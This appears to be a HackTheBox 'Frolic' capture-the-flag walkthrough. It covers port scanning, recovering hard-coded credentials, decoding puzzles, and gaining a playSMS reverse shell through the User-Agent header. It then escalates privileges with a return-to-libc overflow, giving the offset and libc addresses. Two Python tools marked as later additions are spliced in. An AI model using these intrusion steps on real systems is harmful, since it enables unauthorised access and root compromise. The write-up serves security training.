Frolic

Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.

The following nmap command scans the target machine for open ports quickly and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.111 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, the fastest of nmap's timing templates.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

Now that we know which ports are open, let's try to obtain the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:

nmap -sC -sV -p22,139,445,1880,9999 10.10.10.111 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.

Guest login on the SMB server is enabled, but there are no available shares we could check.

smbmap -H 10.10.10.111

  • -H IP address of host.

The website on port 1880 shows a login page for a Node-RED application.

On the other hand, the website on port 9999 just shows the default nginx page.

We can find some subdirectories with gobuster.

gobuster dir -u http://10.10.10.111:9999 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of concurrent threads, in this case 200 threads.

  • -x file extensions to search for.

Exploitation

The /admin directory shows another login page.

If we try some random credentials, we'll see a popup alert saying that we only have 2 more attempts.

In the source code, we can see a js/login.js script being executed.

The script checks for the user admin and the password superduperlooperpassword_lol.

Logging in with those credentials, we get the message Login successfully.

We are then redirected to /admin/success.html, which shows a strange message.

It looks like Ook!, but with the word Ook missing. Let's paste the message into the file message.txt and add the word Ook before every ., ? and ! character (note that the dot has to be escaped in sed, otherwise it matches any character).

cat message.txt | sed 's/\./Ook./g' | sed 's/!/Ook!/g' | sed 's/?/Ook?/g'

Now we could use a tool such as dcode.fr to decode the message.

We have a new directory. Let's check it out.

It looks like some base64-encoded text. If we put it in a file and decode it, we'll see what looks like a .zip file, because the first bytes are the ZIP magic number PK.

cat base64 | base64 -d

Let's write the output to a file called msg.zip.

cat base64 | base64 -d > msg.zip

file msg.zip

If we try to decompress the file, it will ask for a password.

unzip msg.zip

We can extract a crackable hash from the ZIP file with zip2john.

zip2john msg.zip > msg.zip.hash

And then try to crack it with john.

john --wordlist=/usr/share/wordlists/rockyou.txt msg.zip.hash

Now we can decompress the file with the password password.

unzip msg.zip

The index.php file contains hex-encoded data.

cat index.php

If we decode it, we'll see some base64-encoded text again.

cat index.php | xxd -r -p

Decoding the base64 gives us some brainfuck code.

cat index.php | xxd -r -p | tr -d "\n\r" | base64 -d

We could use dcode.fr again to decode the message. We'll get what looks like a password.
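Both decoding steps above (the Ook! message on success.html, and the hex → base64 → brainfuck chain in index.php) can be done offline instead of pasting the data into dcode.fr. The following Python interpreter is an added example, not part of the original write-up; it assumes the standard Ook!/brainfuck instruction mapping, accepts both the full form ("Ook. Ook?") and the short form in which only the ., ? and ! symbols remain (so the sed step is not needed), and uses a constructed sample program that prints HI rather than the machine's real message.

```python
import base64
import re

# Standard Ook! -> brainfuck mapping: each instruction is a pair of the symbols . ? !
OOK_TO_BF = {
    '.?': '>', '?.': '<', '..': '+', '!!': '-',
    '!.': '.', '.!': ',', '!?': '[', '?!': ']',
}
BF_TO_OOK = {bf: ook for ook, bf in OOK_TO_BF.items()}

def ook_to_brainfuck(text):
    """Translate Ook! to brainfuck. Works for the full form ("Ook. Ook?") and for
    the short form where the word Ook is missing and only . ? ! remain."""
    symbols = re.sub(r'[^.?!]', '', text)
    if len(symbols) % 2:
        raise ValueError("Ook! program must contain an even number of symbols")
    return ''.join(OOK_TO_BF[symbols[i:i + 2]] for i in range(0, len(symbols), 2))

def brainfuck_to_ook(code):
    """Inverse translation (full form), used here only to build test input."""
    return ' '.join('Ook' + BF_TO_OOK[c][0] + ' Ook' + BF_TO_OOK[c][1]
                    for c in code if c in BF_TO_OOK)

def run_brainfuck(code, stdin=b'', max_steps=5_000_000):
    """Interpret brainfuck and return its output bytes. Characters that are not
    commands are ignored; the step limit guards against non-terminating input."""
    code = [c for c in code if c in '<>+-.,[]']
    jump, stack = {}, []
    for i, c in enumerate(code):              # pre-match the brackets once
        if c == '[':
            stack.append(i)
        elif c == ']':
            if not stack:
                raise ValueError("unmatched ] at position %d" % i)
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unmatched [")
    tape, ptr, pc, inp, out, steps = bytearray(30000), 0, 0, 0, bytearray(), 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        c = code[pc]
        if c == '>':
            ptr = (ptr + 1) % len(tape)
        elif c == '<':
            ptr = (ptr - 1) % len(tape)
        elif c == '+':
            tape[ptr] = (tape[ptr] + 1) & 0xFF   # 8-bit cells wrap around
        elif c == '-':
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == '.':
            out.append(tape[ptr])
        elif c == ',':
            tape[ptr] = stdin[inp] if inp < len(stdin) else 0   # EOF reads as 0
            inp += 1
        elif c == '[' and tape[ptr] == 0:
            pc = jump[pc]
        elif c == ']' and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return bytes(out)

def run_ook(text, stdin=b''):
    return run_brainfuck(ook_to_brainfuck(text), stdin)

def decode_index_php(hex_text):
    """Reproduce the index.php chain: hex -> base64 -> brainfuck -> output."""
    raw = bytes.fromhex(re.sub(r'\s', '', hex_text))
    return run_brainfuck(base64.b64decode(raw).decode('ascii'))

# Constructed sample (not the real message from the machine): prints "HI".
SAMPLE_BF = "++++++++[>+++++++++<-]>.+."
SAMPLE_OOK_SHORT = ''.join(BF_TO_OOK[c] for c in SAMPLE_BF)   # ".." "!?" "..." form
SAMPLE_INDEX_HEX = base64.b64encode(SAMPLE_BF.encode()).hex()  # what index.php would hold

if __name__ == '__main__':
    print(run_brainfuck(SAMPLE_BF))
    print(run_ook(SAMPLE_OOK_SHORT))
    print(decode_index_php(SAMPLE_INDEX_HEX))
```

To use it on the real data, pass the contents of message.txt to run_ook and the contents of index.php to decode_index_php; both return the decoded bytes.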

gobuster also found some other directories we have not looked at yet, such as /dev, which returns a 403 Forbidden.

We can run the directory listing again, this time under the /dev directory.

gobuster dir -u http://10.10.10.111:9999/dev -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of concurrent threads, in this case 200 threads.

  • -x file extensions to search for.

There is a new directory under /dev called /backup, which contains another directory called /playsms.

This new directory has another login page, in which we can log in with the user admin and the password we found earlier, idkwhatispass.

If we search for common vulnerabilities in playSMS, we'll see that there are quite a few of them.

searchsploit playsms

This specific exploit explains how to get Remote Code Execution on the web server. The vulnerability allows us to execute commands via the User-Agent header. First, we'll have to create the backdoor.csv file with the following content.

Now, go to the following URL.

http://10.10.10.111:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list

Upload the backdoor.csv file, intercept the request with Burp Suite, and put a command that sends us a reverse shell in the User-Agent header.

Before hitting Forward, let's set a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

If we now forward the request, we should get a shell as the www-data user. Then we'll be able to grab the user flag.

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command on our local machine:

stty size

And set the proper dimensions on the victim machine:

stty rows 51 columns 236

There is a hidden folder called .binary in the home directory of the user ayush.

ls -la /home/ayush/

The directory contains a file called rop with the SUID bit set.

ls -l /home/ayush/.binary/

If we execute the binary, it will ask for a message.

rop

Giving a message as an argument just prints it out.

rop testing

If I generate 500 A characters with python and pass them as an argument to the rop binary, the program crashes.

rop $(python -c "print('A'*500)")

This means that the binary might be vulnerable to a buffer overflow attack. Let's transfer the binary to our machine. Start a simple HTTP server with python on the victim machine.

python -m SimpleHTTPServer 1234

Then, download it from our local machine.

wget http://10.10.10.111:1234/rop

chmod +x rop

Let's run the binary with gdb.

gdb ./rop

Note that I am using gef. As before, if I run the program with 500 A characters, it will crash, and I'll be able to see the registers filled with 41 (the hex value of A).

gef➤ r $(python -c "print('A'*500)")

The program only has the NX memory protection enabled.

Data Execution Prevention (DEP) or No-Execute (NX) works with the processor to help prevent buffer overflow attacks by blocking code execution from memory that is marked as non-executable.

gef➤ checksec

We can also check on the victim machine that ASLR is not enabled.

Address space layout randomization (ASLR) is a memory-protection process for operating systems that guards against buffer-overflow attacks by randomizing the location where system executables are loaded into memory.

cat /proc/sys/kernel/randomize_va_space
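The two checks above (checksec in gef, and the randomize_va_space sysctl) can be reproduced from the ELF program headers and the sysctl value directly, which is handy when auditing SUID binaries on a host. The following Python is an added example, not part of the original write-up: elf_protections reads NX, PIE and RELRO from a 32-bit or 64-bit ELF image, aslr_level interprets the sysctl value, and findings summarises what is missing. build_elf is a constructed helper that produces a minimal header-only image for demonstration; it is not the rop binary, whose contents are not on the page.

```python
import struct

ET_EXEC, ET_DYN = 2, 3                       # e_type: fixed-address executable vs PIE
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4

def elf_protections(data):
    """Read NX / PIE / RELRO state straight from the ELF program headers,
    for both 32-bit (like the rop binary) and 64-bit images."""
    if data[:4] != b'\x7fELF':
        raise ValueError("not an ELF image")
    is64 = data[4] == 2                       # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    hdr_fmt = '<16sHHIQQQIHHHHHH' if is64 else '<16sHHIIIIIHHHHHH'
    hdr = struct.unpack_from(hdr_fmt, data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    ph_fmt = '<IIQQQQQQ' if is64 else '<IIIIIIII'
    stack_flags, relro = None, False
    for i in range(e_phnum):
        ph = struct.unpack_from(ph_fmt, data, e_phoff + i * e_phentsize)
        p_type = ph[0]
        p_flags = ph[1] if is64 else ph[6]    # p_flags sits at a different position per class
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {
        'bits': 64 if is64 else 32,
        # No PT_GNU_STACK header at all means the loader gives the process an executable stack.
        'nx': stack_flags is not None and not (stack_flags & PF_X),
        'pie': e_type == ET_DYN,
        'relro': relro,
    }

ASLR_LEVELS = {
    0: 'disabled: no randomization at all',
    1: 'conservative: stack, mmap regions, VDSO and shared libraries are randomized',
    2: 'full: additionally randomizes the heap (brk) base',
}

def aslr_level(randomize_va_space):
    """Interpret the contents of /proc/sys/kernel/randomize_va_space."""
    value = int(randomize_va_space.strip())
    if value not in ASLR_LEVELS:
        raise ValueError("unexpected randomize_va_space value %r" % value)
    return value, ASLR_LEVELS[value]

def findings(elf_report, aslr):
    """Summarise what a SUID binary built like this is missing."""
    out = []
    if not elf_report['nx']:
        out.append('executable stack')
    if not elf_report['pie']:
        out.append('no PIE (fixed code addresses)')
    if not elf_report['relro']:
        out.append('no RELRO')
    if aslr == 0:
        out.append('system-wide ASLR disabled')
    return out

def build_elf(bits, e_type, stack_flags=None, relro=False):
    """Constructed test image: ELF header plus program headers only (not loadable)."""
    is64 = bits == 64
    ehsize, phentsize = (64, 56) if is64 else (52, 32)
    phdrs = []
    if stack_flags is not None:
        phdrs.append((PT_GNU_STACK, stack_flags))
    if relro:
        phdrs.append((PT_GNU_RELRO, PF_R))
    ident = b'\x7fELF' + bytes([2 if is64 else 1, 1, 1, 0]) + b'\x00' * 8
    hdr_fmt = '<16sHHIQQQIHHHHHH' if is64 else '<16sHHIIIIIHHHHHH'
    header = struct.pack(hdr_fmt, ident, e_type, 0x3E if is64 else 0x03, 1, 0,
                         ehsize, 0, 0, ehsize, phentsize, len(phdrs), 0, 0, 0)
    body = b''
    for p_type, p_flags in phdrs:
        if is64:
            body += struct.pack('<IIQQQQQQ', p_type, p_flags, 0, 0, 0, 0, 0, 16)
        else:
            body += struct.pack('<IIIIIIII', p_type, 0, 0, 0, 0, 0, p_flags, 4)
    return header + body

if __name__ == '__main__':
    # Constructed image resembling the checksec result above: 32-bit, NX only.
    report = elf_protections(build_elf(32, ET_EXEC, PF_R | PF_W))
    print(report, findings(report, aslr_level("0")[0]))
```

To audit a real file, pass open(path, 'rb').read() to elf_protections and the sysctl file contents to aslr_level; a SUID binary that reports no PIE on a host with ASLR disabled is exactly the combination that makes the fixed libc addresses used later in this write-up reliable.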

As ASLR is disabled and the NX memory protection is enabled, the easiest way of exploiting this buffer overflow is a return-to-libc attack.

Return-to-libc is a technique for executing code that is not on the stack but in a region of memory that is already executable, for example libc. The code used to subvert the program consists of functions that already exist within that library.

First, let's check at what point we start overwriting the EIP. Create a pattern with gef.

gef➤ pattern create 100

And execute the program giving the pattern as an argument.

gef➤ r aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

As we can see, EIP holds the value naaa. From that value, we can determine that the offset is 52.

gef➤ pattern offset $eip

Now that I control EIP, I can fill it with B characters to confirm it.

gef➤ r $(python -c "print('A'*52+'B'*4)")

To exploit return-to-libc and be able to spawn a shell as root, we'll need the system address, the exit address, the /bin/sh address and the base_libc address. First, we can get the base_libc address from the victim machine, which is 0xb7e19000 in this case.

ldd rop

We can see that the offsets of the system and exit functions are 0x0002e9d0 and 0x0003ada0 respectively.

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -E " system@@| exit@@"

  • -s display the symbol table.

Finally, we'll need the offset of the /bin/sh string, which is 0x0015ba0b.

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"

  • -a scan the entire file.

  • -t x print the location of the string in base 16.

Now that I have the offsets and the base_libc address, I can calculate the system, exit and /bin/sh addresses by adding each offset to the base_libc address.

The final payload will be the initial 52 A characters, followed by the system address, the exit address and the /bin/sh address. The following script calculates all the addresses and executes the rop binary with the final payload as an argument, which should spawn a shell as root.

If we execute the script, we should get a shell as root, and then all we have to do is reap the harvest and take the root flag.

python /tmp/privEsc/bof.py
